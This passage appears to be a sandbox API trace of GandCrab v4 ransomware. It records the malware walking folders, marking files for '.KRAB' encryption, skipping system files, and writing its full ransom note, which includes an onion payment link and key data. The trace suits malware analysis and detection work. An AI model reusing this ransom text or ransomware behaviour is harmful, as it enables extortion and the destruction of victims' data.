lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.819] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned 64 [0099.819] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0099.819] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.819] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.820] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\") returned 41 [0099.820] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*" [0099.820] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbdae0 [0099.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.820] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0099.820] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0099.820] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.820] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0099.820] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0099.820] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0099.820] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a08d2ca4dee3d.lock" [0099.820] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.821] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 69 [0099.821] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned 64 [0099.821] lstrlenW (lpString=".lock") returned 5 [0099.821] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.821] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0099.821] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.821] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.822] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0099.822] lstrcmpW (lpString1="InputPersonalization", lpString2=".") returned 1 [0099.822] lstrcmpW (lpString1="InputPersonalization", lpString2="..") returned 1 [0099.822] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="InputPersonalization" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization" [0099.822] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\" [0099.822] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.822] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.822] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.822] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.822] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.822] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.823] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.823] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\\\KRAB-DECRYPT.txt") returned 79 [0099.823] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0099.824] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.824] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.825] CloseHandle (hObject=0x778) returned 1 [0099.826] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.826] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.827] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x1c)) [0099.827] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.827] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.827] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.827] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a08d2ca4dee3d.lock") returned 85 [0099.827] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0099.871] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.872] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.872] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\") returned 62 [0099.872] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*" [0099.872] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbdb20 [0099.872] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.872] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0099.873] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0099.873] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.873] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0099.873] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0099.873] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0099.873] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a08d2ca4dee3d.lock" [0099.873] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.873] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0099.873] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a08d2ca4dee3d.lock") returned 85 [0099.873] lstrlenW (lpString=".lock") returned 5 [0099.873] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.874] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0099.874] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.874] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.874] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0099.874] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0099.874] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0099.874] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\KRAB-DECRYPT.txt" [0099.874] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.875] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\KRAB-DECRYPT.txt.KRAB") returned 83 [0099.875] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\KRAB-DECRYPT.txt") returned 78 [0099.875] lstrlenW (lpString=".txt") returned 4 [0099.875] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.875] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0099.875] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.875] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\KRAB-DECRYPT.txt") returned 78 [0099.875] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\KRAB-DECRYPT.txt") returned 78 [0099.875] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0099.875] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0099.875] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0099.876] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0099.876] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0099.876] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0099.876] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0099.876] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0099.876] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0099.876] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0099.876] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.876] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0099.876] lstrcmpW (lpString1="TrainedDataStore", lpString2=".") returned 1 [0099.876] lstrcmpW (lpString1="TrainedDataStore", lpString2="..") returned 1 [0099.876] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="TrainedDataStore" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" [0099.876] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\" [0099.876] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.877] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.877] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.877] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\\\KRAB-DECRYPT.txt") returned 96 [0099.877] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0099.880] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 